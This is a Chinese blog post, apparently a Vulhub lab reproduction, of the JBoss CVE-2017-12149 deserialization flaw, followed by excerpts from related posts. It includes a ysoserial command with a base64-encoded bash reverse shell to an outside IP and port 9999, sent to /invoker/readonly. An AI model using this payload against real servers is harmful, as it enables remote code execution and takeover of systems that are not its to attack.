JBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149）

n1ght_X

于 2023-03-13 15:58:28 发布

阅读量257

点赞数

文章标签： web安全安全 Powered by 金山文档

本文链接：https://blog.csdn.net/zzzzz1284/article/details/129496513

版权

原因

该漏洞为 Java反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化，从而导致了漏洞。

参考：

https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg

https://access.redhat.com/security/cve/cve-2017-12149

复现

该漏洞出现在/invoker/readonly请求中，服务器将用户提交的POST内容进行了Java反序列化：

所以，我们用常规Java反序列化漏洞测试方法来复现该漏洞。

编写反弹shell的命令

我们使用bash来反弹shell，但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法，我们需要用进行一次编码。工具：http://www.jackson-t.ca/runtime-exec-payloads.html

序列化数据生成

使用ysoserial来复现生成序列化数据，由于Vulhub使用的Java版本较新，所以选择使用的gadget是CommonsCollections5：

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzIxNi4xMjcuMTY0LjIzOC85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser

生成poc文件

在/invoker/readonly上传，成功反弹shell

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

n1ght_X

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
JBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149）

CVE-2017-12149
复制链接

扫一扫

墨者_JBoss 5.x / 6.x反序列化漏洞分析溯源

weixin_50698958的博客

10-20

356

靶场： https://www.mozhe.cn/bug/detail/bVk4Z1hPRktPZStBVWV6QUw2YmY0dz09bW96aGUmozhe 背景介绍 JBoss 5.x / 6.x反序列化漏洞分析溯源实训目标 1、了解JBoss 5.x / 6.x反序列化漏洞形成原理； 2、掌握JBoss 5.x / 6.x反序列化漏洞利用方法；解题方向利用JBoss 5.x / 6.x反序列化漏洞执行任意代码。 key在根目录；解题思路：访问JBoss漏洞页面，响应码..

JBoss 5.x/6.x 反序列化漏洞复现（CVE-2017-12149）

最新发布

qq_40860153的博客

06-14

347

该漏洞为 Java反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。2、使用bash来反弹shell，但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法，需要进行一次编码。反弹shell工具，地址：https://github.com/joaomatosf/jexboss。vulhub靶场环境: http://192.168.1.129:8080/

参与评论您还未登录，请先登录后发表或查看评论

渗透测试-JBoss 5.x/6.x反序列化漏洞

道阻且长，行则将至。

07-08

1728

漏洞概述 2017年8月30日，Redhat公司发布了一个JbossAS 5.x系统的远程代码执行严重漏洞通告，相应的漏洞编号为 CVE-2017-12149。近期有安全研究者发现JbossAS 6.x也受该漏洞影响，攻击者可能利用此漏洞无需用户验证在系统上执行任意命令。类型描述漏洞名称 JBOSSAS5.x/6.x反序列化命令执行漏洞威胁类型远程命令执行威胁等级高漏洞ID CVE-2017-12149 受影响系统及应用版本 Jboss AS 5.x、Jbos

JBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149）复现

YouthBelief的博客

11-01

642

JBoss漏洞复现前言一、JBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149）0x01 漏洞描述0x02 影响范围0x03 漏洞利用工具直接利用0x04 漏洞修复总结前言使用bash来反弹shell，但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法，我们需要用进行一次编码。一、JBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149） 0x01 漏洞描述该漏洞为 Java反序列化错误类型，存在于 Jboss 的 Ht

JBOSSAS 5.x/6.x 反序列化命令执行漏洞(CVE-2017-12149)

weixin_30606461的博客

11-27

166

　　本文主要记录一下JBOSSAS 5.x/6.x 反序列化命令执行漏洞的测试过程仅供学习　　文中利用到漏洞环境由phith0n维护: JBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149）　　靶机地址：192.168.1.102 服务端口:8080　　　　　　测试机：192.168.1.100 　　搭建好环境，访问地址：http://192.168...

JBoss JMXInvokerServlet 反序列化漏洞（CVE-2015-7501）

黑白的博客

12-21

2024

声明好好学习，天天向上漏洞描述这是经典的JBoss反序列化漏洞，JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象，然后我们利用Apache Commons Collections中的Gadget执行任意代码。影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6

JBossMQJMS 反序列化漏洞（CVE-2017-7504）漏洞利用工具

07-23

JBossMQJMS 反序列化漏洞（CVE-2017-7504）是针对企业级Java消息服务（JMS）提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象，使得攻击者可以通过精心构造的恶意输入触发任意代码...

CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)

08-08

【标题】"CVE-2017-12149 JBOSS AS 6.X 反序列化漏洞详解及反弹shell技术" 【内容】 CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞，它涉及到了Java对象的反序列化过程。在Java中，反...

Jboss Application Server反序列化命令执行漏洞利用工具（CVE-2017-12149）

07-23

在2017年，它被发现存在一个严重的安全漏洞，被称为CVE-2017-12149，这是一个反序列化漏洞，允许远程攻击者通过精心构造的输入来执行任意系统命令，从而对受影响的系统造成严重威胁。反序列化是将已序列化的对象...

Java反序列化漏洞利用工具.zip

04-10

标题"Java反序列化漏洞利用工具.zip"表明该压缩包内包含了针对Java反序列化漏洞的利用工具，特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器，广泛用于部署各种业务...

JBoss5.x / 6.x反序列化漏洞（CVE-2017-12149）

Kevin's Blog

06-08

826

一、漏洞介绍 1.1 漏洞详情该漏洞为Java反序列化错误类型，存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化。该漏洞在内网中比较常见。 1.2 影响版本 JBoss 5.x 和 6.x 二、环境搭建受害者：192.168.159.129（vulhub）攻击者：192.168.158.128（kali）》》进入到如下目录启动环境》》查看启动的端口》》访问we

JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149

willow_liang的博客

10-24

233

漏洞原理：漏洞复现下载利用工具 javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java javac将java源文件编译为class字节码文件。-cp指明.java文件中import类的位置 java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"

JBoss 5.x6.x 反序列化漏洞（CVE-2017-12149）

weixin_47311099的博客

12-08

222

JBoss 5.x/6.x 反序列化漏洞（CVE-2017-12149）该漏洞为 Java反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化，从而导致了漏洞。环境启动 vulhub进入vulhub/jboss/CVE-2017-12149启动，需要等2分钟左右 docker-compose up -d 访问本机ip的8080端口漏洞复现使用工具检

JBoss5.x6.x 反序列化漏洞

weixin_44110913的博客

11-05

269

JBOSS 下载地址：http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip EXP 下载地址：https://github.com/yunxu1/jboss-_CVE-2017-12149 2). 环境搭建 wget http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip 第二步：修改配置文件，使网络中的主机都

JBoss 5.x/6.x 反序列化漏洞复现

LuckySec

12-02

267

0x01 漏洞简介该漏洞为 Java反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化，从而导致了漏洞。影响版本: JBoss 5.x JBoss 6.x 0x02 漏洞环境使用vulhub漏洞平台，执行下面命令启动漏洞环境： cd /vulhub/jboss/CVE-2017-12149 sudo docker-compose up -d 首次

CVE-2017-12149漏洞分析

05-30

该漏洞影响JBoss Application Server 5.x、6.x和7.x版本。Red Hat已经发布了相关的安全公告和补丁，建议用户及时更新。总之，CVE-2017-12149漏洞的危害非常严重，对于使用JBOSS应用服务器的用户来说，需要及时关注...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交